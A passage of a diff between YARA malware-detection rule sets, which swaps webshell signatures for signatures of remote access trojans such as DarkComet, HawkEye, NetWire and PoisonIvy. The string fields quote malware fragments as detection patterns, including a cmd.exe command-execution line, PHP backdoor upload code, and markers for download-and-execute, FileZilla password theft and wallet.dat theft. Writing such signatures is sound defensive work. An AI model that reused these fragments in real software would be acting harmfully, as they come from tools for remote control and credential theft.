+		description = "Detects DarkComet RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "e6fd0269-dd0c-58c0-a1a3-24c2aed916ee"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/DarkComet"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L256-L282"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d7bba8def713512ddda14baf9cd6889a"
-		logic_hash = "24d558292a709bb29334b1acdc53cdb6c5bc6803caec527edcacd6a19f6dc7c9"
+		logic_hash = "db139f754f89affc706e090a41bfcd30cf49f9d4e16ade89993ee170f92cf68b"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s0 = "<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['command']?>"
+		$a1 = "#BOT#URLUpdate"
+		$a2 = "Command successfully executed!"
+		$a3 = "MUTEXNAME" wide
+		$a4 = "NETDATA" wide
+		$b1 = "FastMM Borland Edition"
+		$b2 = "%s, ClassID: %s"
+		$b3 = "I wasn't able to open the hosts file"
+		$b4 = "#BOT#VisitUrl"
+		$b5 = "#KCMDDC"
 
 	condition:
-		all of them
+		all of ( $a* ) or all of ( $b* )
 }
-rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006Z
+rule SIGNATURE_BASE_RAT_Darkrat
 {
 	meta:
-		description = "Webshells Auto-generated - file 2006Z.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7541-L7553"
+		description = "Detects DarkRAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "8283236a-6ed1-5213-8386-a029867b9677"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/DarkRAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L284-L306"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fd1b6129abd4ab177fed135e3b665488"
-		logic_hash = "4b427132541cd26ee47c387a98f6f46f86808f9a775068e1d114c9ef4abca9f6"
+		logic_hash = "dccb473a3cf4478dd1dbf8b35ad564f59740676ecde90266a0dc15cbad89bfe7"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s1 = "wangyong,czy,allen,lcx,Marcos,kEvin1986,myth"
-		$s8 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x"
+		$a = "@1906dark1996coder@"
+		$b = "SHEmptyRecycleBinA"
+		$c = "mciSendStringA"
+		$d = "add_Shutdown"
+		$e = "get_SaveMySettingsOnExit"
+		$f = "get_SpecialDirectories"
+		$g = "Client.My"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Admin_Ad
+rule SIGNATURE_BASE_RAT_Greame
 {
 	meta:
-		description = "Webshells Auto-generated - file admin-ad.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7d87b4f6-3227-53cb-803c-4f9c7327f203"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7554-L7566"
+		description = "Detects Greame RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "b90d3747-407a-5552-971f-78ff78f827a6"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Greame"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L308-L331"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e6819b8f8ff2f1073f7d46a0b192f43b"
-		logic_hash = "0febd10979a959af73332a8e064a510e949109abf863b5fd0fef19b635968d1d"
+		logic_hash = "4a1ce5f5847bdc01d286c1d9cd1e16ba2fd6b5bc56e6094cb1492882708e8e59"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s6 = "<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" siz"
-		$s7 = "Response.write\"<a href='\"&url&\"?path=\"&Request(\"oldpath\")&\"&attrib=\"&attrib&\"'><"
+		$a = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23}
+		$b = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23}
+		$c = "EditSvr"
+		$d = "TLoader"
+		$e = "Stroks"
+		$f = "Avenger by NhT"
+		$g = "####@####"
+		$h = "GREAME"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Casus15
+rule SIGNATURE_BASE_RAT_Hawkeye
 {
 	meta:
-		description = "Webshells Auto-generated - file casus15.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "305842e4-26ad-573d-8df3-e32e239e434b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7567-L7578"
+		description = "Detects HawkEye RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "22b1d1e6-feea-5f84-9564-326ad80bbd8d"
+		date = "2015-01-06"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/HawkEye"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L333-L357"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8d155b4239d922367af5d0a1b89533a3"
-		logic_hash = "58921290952f23ff5b828d8c92c818ebd91b726cdbbc9137b0f55a0e5ca90636"
+		logic_hash = "db3a0fe5774f0d137e092a4eb9672a4518d0ef943a1a4619cb646a9ac9f74ee0"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "KeyLogger"
+		filetype = "exe"
 
 	strings:
-		$s6 = "if((is_dir(\"$deldir/$file\")) AND ($file!=\".\") AND ($file!=\"..\"))"
+		$key = "HawkEyeKeylogger" wide
+		$salt = "099u787978786" wide
+		$string1 = "HawkEye_Keylogger" wide
+		$string2 = "holdermail.txt" wide
+		$string3 = "wallet.dat" wide
+		$string4 = "Keylog Records" wide
+		$string5 = "<!-- do not script -->" wide
+		$string6 = "\\pidloc.txt" wide
+		$string7 = "BSPLIT" wide
 
 	condition:
-		all of them
+		$key and $salt and all of ( $string* )
 }
-rule SIGNATURE_BASE_BIN_Client
+rule SIGNATURE_BASE_RAT_Imminent
 {
 	meta:
-		description = "Webshells Auto-generated - file Client.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "515ab1b3-7923-55de-8c19-71ef5d9b4366"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7579-L7595"
+		description = "Detects Imminent RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "deddef60-c309-54e0-a488-ce937ed7eae3"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Imminent"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L359-L389"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9f0a74ec81bc2f26f16c5c172b80eca7"
-		logic_hash = "e1277f6b7adc2e832a3aad96c7e44796596d2e61eb9247977da3c3569777e0b2"
+		logic_hash = "aebae753c119950b0b3f315c7279866caf15f4d482c0a47912c90885adcf6db2"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s0 = "=====Remote Shell Closed====="
-		$s2 = "All Files(*.*)|*.*||"
-		$s6 = "WSAStartup Error!"
-		$s7 = "SHGetFileInfoA"
-		$s8 = "CreateThread False!"
-		$s9 = "Port Number Error"
+		$v1a = "DecodeProductKey"
+		$v1b = "StartHTTPFlood"
+		$v1c = "CodeKey"
+		$v1d = "MESSAGEBOX"
+		$v1e = "GetFilezillaPasswords"
+		$v1f = "DataIn"
+		$v1g = "UDPzSockets"
+		$v1h = {52 00 54 00 5F 00 52 00 43 00 44 00 41 00 54 00 41}
+		$v2a = "<URL>k__BackingField"
+		$v2b = "<RunHidden>k__BackingField"
+		$v2c = "DownloadAndExecute"
+		$v2d = "-CHECK & PING -n 2 127.0.0.1 & EXIT" wide
+		$v2e = "england.png" wide
+		$v2f = "Showed Messagebox" wide
 
 	condition:
-		4 of them
+		all of ( $v1* ) or all of ( $v2* )
 }
-rule SIGNATURE_BASE_Shelltools_G0T_Root_Uptime
+rule SIGNATURE_BASE_RAT_Infinity
 {
 	meta:
-		description = "Webshells Auto-generated - file uptime.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4f649757-9502-5640-bc17-11cad6c779f4"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7596-L7611"
+		description = "Detects Infinity RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "b70f9459-fa84-516f-841d-d9617856eb4d"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Infinity"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L391-L414"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d1f56102bc5d3e2e37ab3ffa392073b9"
-		logic_hash = "5d91dda859a63a965250bd4d76565c6adf18e4ee306be3b91965e5d35bc521e8"
+		logic_hash = "c1f5381755af6cfbb10a4769757cdeffb9651bddc76bc4c8e9765ed44bf37fe6"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s0 = "JDiamondCSlC~"
-		$s1 = "CharactQA"
-		$s2 = "$Info: This file is packed with the UPX executable packer $"
-		$s5 = "HandlereateConso"
-		$s7 = "ION\\System\\FloatingPo"
+		$a = "CRYPTPROTECT_PROMPTSTRUCT"
+		$b = "discomouse"
+		$c = "GetDeepInfo"
+		$d = "AES_Encrypt"
+		$e = "StartUDPFlood"
+		$f = "BATScripting" wide
+		$g = "FBqINhRdpgnqATxJ.html" wide
+		$i = "magic_key" wide
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Simple_PHP_Backdoor
+rule SIGNATURE_BASE_RAT_Lostdoor
 {
 	meta:
-		description = "Webshells Auto-generated - file Simple_PHP_BackDooR.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bd7c19b9-e035-5e70-b626-1d210cadc055"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7612-L7625"
+		description = "Detects LostDoor RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "f86ae7a1-2182-5b2e-8f9e-9e8456f574bc"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/LostDoor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L440-L465"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a401132363eecc3a1040774bec9cb24f"
-		logic_hash = "9739217c23f583452fbf1d7a8e20b2f1379ebf430e0a4fd73ad62e88d544670a"
+		logic_hash = "7ffa6f5cbeacca5a1e750e35d8296658d4e280078a61f94fd5f2d4b7c800bb44"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s0 = "<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he"
-		$s6 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn"
-		$s9 = "// a simple php backdoor"
+		$a0 = {0D 0A 2A 45 44 49 54 5F 53 45 52 56 45 52 2A 0D 0A}
+		$a1 = "*mlt* = %"
+		$a2 = "*ip* = %"
+		$a3 = "*victimo* = %"
+		$a4 = "*name* = %"
+		$b5 = "[START]"
+		$b6 = "[DATA]"
+		$b7 = "We Control Your Digital World" wide ascii
+		$b8 = "RC4Initialize" wide ascii
+		$b9 = "RC4Decrypt" wide ascii
 
 	condition:
-		1 of them
+		all of ( $a* ) or all of ( $b* )
 }
-rule SIGNATURE_BASE_Sig_2005Gray
+rule SIGNATURE_BASE_RAT_Luminositylink
 {
 	meta:
-		description = "Webshells Auto-generated - file 2005Gray.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "978fb04e-517d-51cf-98ca-5fd6b421365e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7626-L7640"
+		description = "Detects LuminosityLink RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "163fe10c-38a1-53d3-b3a5-4240229e0306"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/LuminosityLink"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L467-L493"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "75dbe3d3b70a5678225d3e2d78b604cc"
-		logic_hash = "927ed5cdaa14b6cd63a6ca7d7bec6635b69fa19d88808890e7d198fb7a0b57b4"
+		logic_hash = "5e70e3e0885d098f1ac2bcc324cd8ad2682fbfc395f189cabc4a4f97a0109682"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s0 = "SCROLLBAR-FACE-COLOR: #e8e7e7;"
-		$s4 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
-		$s8 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
-		$s9 = "SCROLLBAR-3DLIGHT-COLOR: #cccccc;"
+		$a = "SMARTLOGS" wide
+		$b = "RUNPE" wide
+		$c = "b.Resources" wide
+		$d = "CLIENTINFO*" wide
+		$e = "Invalid Webcam Driver Download URL, or Failed to Download File!" wide
+		$f = "Proactive Anti-Malware has been manually activated!" wide
+		$g = "REMOVEGUARD" wide
+		$h = "C0n1f8" wide
+		$i = "Luminosity" wide
+		$j = "LuminosityCryptoMiner" wide
+		$k = "MANAGER*CLIENTDETAILS*" wide
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Dllinjection
+rule SIGNATURE_BASE_RAT_Luxnet
 {
 	meta:
-		description = "Webshells Auto-generated - file DllInjection.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8a57e122-fd00-57f3-94db-736c5bfd76db"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7641-L7652"
+		description = "Detects LuxNet RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "277db509-5ba0-5d1b-b17a-d5914f1f1650"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/LuxNet"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L495-L516"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a7b92283a5102886ab8aee2bc5c8d718"
-		logic_hash = "6e01ae1cc8a91a5e0d22bdf477aa72bf0116dbe31752a069b1e34d8a09ec6213"
+		logic_hash = "55d872e2e30f6d55a6f91750bbb52675042e4673d712a4f2417af43b0f2c4fb9"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s0 = "\\BDoor\\DllInjecti"
+		$a = "GetHashCode"
+		$b = "Activator"
+		$c = "WebClient"
+		$d = "op_Equality"
+		$e = "dickcursor.cur" wide
+		$f = "{0}|{1}|{2}" wide
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Mithril_V1_45_Mithril
+rule SIGNATURE_BASE_RAT_Netwire
 {
 	meta:
-		description = "Webshells Auto-generated - file Mithril.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3c160017-0332-532a-bb7f-390a4a34dc4e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7653-L7665"
+		description = "Detects NetWire RAT"
+		author = "Kevin Breen <kevin@techanarchy.net> & David Cannings"
+		id = "f0077e8c-3e6a-5a98-9171-b0d81f24d27a"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/NetWire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L547-L569"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f1484f882dc381dde6eaa0b80ef64a07"
-		logic_hash = "a3e74bfb34762553eccaddd745d9e17dc3a5a25201e4bc9e2ea9a49342295c78"
+		logic_hash = "6a4e757262c02dfe46ac28940b53a5695df2d242ccd4c16b42fbfdcf96072e91"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s2 = "cress.exe"
-		$s7 = "\\Debug\\Mithril."
+		$exe1 = "%.2d-%.2d-%.4d"
+		$exe2 = "%s%.2d-%.2d-%.4d"
+		$exe3 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]"
+		$exe4 = "wcnwClass"
+		$exe5 = "[Ctrl+%c]"
+		$exe6 = "SYSTEM\\CurrentControlSet\\Control\\ProductOptions"
+		$exe7 = "%s\\.purple\\accounts.xml"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hkshell_Hkrmv
+rule SIGNATURE_BASE_RAT_Pandora
 {
 	meta:
-		description = "Webshells Auto-generated - file hkrmv.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "986fad12-9198-5e0a-88d6-a9be6963ff8c"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7666-L7678"
+		description = "Detects Pandora RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "d31e4366-8911-5c9c-92dc-a99f5233c626"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Pandora"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L571-L599"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bd3a0b7a6b5536f8d96f50956560e9bf"
-		logic_hash = "f1da0778456272e6d93633a564018bdf0fa74f1db1c9e963a03a59c69c752b6e"
+		logic_hash = "d33598d0699bfb7e996047318099302c2c326e45d993a259c2bc145acf8cf54b"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s5 = "/THUMBPOSITION7"
-		$s6 = "\\EvilBlade\\"
+		$a = "Can't get the Windows version"
+		$b = "=M=Q=U=Y=]=a=e=i=m=q=u=y=}="
+		$c = "JPEG error #%d" wide
+		$d = "Cannot assign a %s to a %s" wide
+		$g = "%s, ProgID:"
+		$h = "clave"
+		$i = "Shell_TrayWnd"
+		$j = "melt.bat"
+		$k = "\\StubPath"
+		$l = "\\logs.dat"
+		$m = "1027|Operation has been canceled!"
+		$n = "466|You need to plug-in! Double click to install... |"
+		$0 = "33|[Keylogger Not Activated!]"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_1
+rule SIGNATURE_BASE_RAT_Paradox
 {
 	meta:
-		description = "Webshells Auto-generated - file phpshell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d0107af3-e484-54cf-a238-dd1e71efd3f6"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		old_rule_name = "phpshell"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7679-L7693"
+		description = "Detects Paradox RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "2f1e6226-799b-54eb-a4a4-6c0f1bf561b4"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Paradox"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L601-L623"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1dccb1ea9f24ffbd085571c88585517b"
-		logic_hash = "eed450ae6668bbee01ea2689e9864f10a66714ec4c91afabb12609ad4ebdac8c"
+		logic_hash = "fef41262b78a497c65c7548c58d78ba8912725b28606fd9e99d1dbc19bdf7393"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s1 = "echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b"
-		$s2 = "$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$REMOTE_IMAGE_UR"
-		$s3 = "$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", "
+		$a = "ParadoxRAT"
+		$b = "Form1"
+		$c = "StartRMCam"
+		$d = "Flooders"
+		$e = "SlowLaris"
+		$f = "SHITEMID"
+		$g = "set_Remote_Chat"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Cmd
+rule SIGNATURE_BASE_RAT_Plasma
 {
 	meta:
-		description = "Webshells Auto-generated - file cmd.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f7a74f21-aec9-5ee7-a80e-0fe34b977a71"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7694-L7706"
+		description = "Detects Plasma RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "2a19c0de-0078-5487-869c-1bcabea57300"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Plasma"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L625-L649"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cbe8e365d41dd3cd8e462ca434cf385f"
-		logic_hash = "43f3379a57210f0e3b70575313115a7ba3d71359de7c5ac9a6a178b93af3545e"
+		logic_hash = "e73348d379c483a7917cf765a457739aed6940f180272fa8d0c0dd1eb8e5f562"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>"
-		$s1 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
+		$a = "Miner: Failed to Inject." wide
+		$b = "Started GPU Mining on:" wide
+		$c = "BK: Hard Bot Killer Ran Successfully!" wide
+		$d = "Uploaded Keylogs Successfully!" wide
+		$e = "No Slowloris Attack is Running!" wide
+		$f = "An ARME Attack is Already Running on" wide
+		$g = "Proactive Bot Killer Enabled!" wide
+		$h = "PlasmaRAT" wide ascii
+		$i = "AntiEverything" wide ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Felikspack3___PHP_Shells_Phpft
+rule SIGNATURE_BASE_RAT_Poisonivy
 {
 	meta:
-		description = "Webshells Auto-generated - file phpft.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "00bc690b-4977-5076-a40a-edd39c37233f"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7707-L7719"
+		description = "Detects PoisonIvy RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "371686d3-878f-56fc-a702-ec49845f486b"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/PoisonIvy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L651-L672"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "60ef80175fcc6a879ca57c54226646b1"
-		logic_hash = "741536acafdc4da618d69bdae2f0a3e8c004a4027cc76c796158ee111c006414"
+		logic_hash = "874e0dfb22a03abc0f7fdc7209ff13b55dfa5dcc17db944903ca37a549eb331d"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s6 = "PHP Files Thief"
-		$s11 = "http://www.4ngel.net"
+		$stub = {04 08 00 53 74 75 62 50 61 74 68 18 04}
+		$string1 = "CONNECT %s:%i HTTP/1.0"
+		$string2 = "ws2_32"
+		$string3 = "cks=u"
+		$string4 = "thj@h"
+		$string5 = "advpack"
 
 	condition:
-		all of them
+		$stub at 0x1620 and all of ( $string* ) or ( all of them )
 }
-rule SIGNATURE_BASE_FSO_S_Indexer
+rule SIGNATURE_BASE_RAT_Predatorpain
 {
 	meta:
-		description = "Webshells Auto-generated - file indexer.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fba053d7-5413-563f-8c27-0554349500b2"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
